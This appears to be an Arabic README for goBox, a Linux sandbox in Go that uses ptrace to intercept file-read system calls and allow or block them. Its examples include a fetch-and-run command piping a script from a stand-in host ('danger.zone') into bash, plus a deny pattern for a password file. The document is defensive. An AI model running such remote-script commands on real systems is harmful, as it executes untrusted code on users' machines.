
صندوق رمل GO لتشغيل كود غير موثوق
صندوق رمل GO لتشغيل الكود غير الموثوق.
يستخدم goBox Ptrace للربط باستدعاءات النظام READ، مما يمنحك خيار قبول أو رفض استدعاءات النظام قبل تنفيذها.
Usage of ./gobox:
gobox [FLAGS] command
flags:
-h Print Usage.
-n value
A glob pattern for automatically blocking file reads.
-y value
A glob pattern for automatically allowing file reads.
> gobox -n "/etc/password.txt" npm install sketchy-module
BLOCKED READ on /etc/password.txt
> gobox -n "/etc/password.txt" bash <(curl https://danger.zone/install.sh)
BLOCKED READ on /etc/password.txt
بالتأكيد يمكنك استخدام strace، لكنه يشير إلى واصفات الملفات، بينما يجعل goBox هذا الأمر أسهل بكثير في لمحة عن طريق طباعة المسار المطلق لوصف الملف (fd).
> gobox ls
Wanting to READ /usr/lib/x86_64-linux-gnu/libselinux.so.1 [y/n]
ملاحظة: من الأفضل بالتأكيد تشفير جميع بياناتك الحساسة، وربما يجب استخدام goBox فقط عندما يكون ذلك غير مريح أو غير عملي.
ملاحظة: لم أبذل أي جهد للتوافق عبر الأنظمة، لذا فهو يعمل حاليًا على لينكس فقط. سأقبل بكل سرور التصحيحات لتحسين قابلية النقل.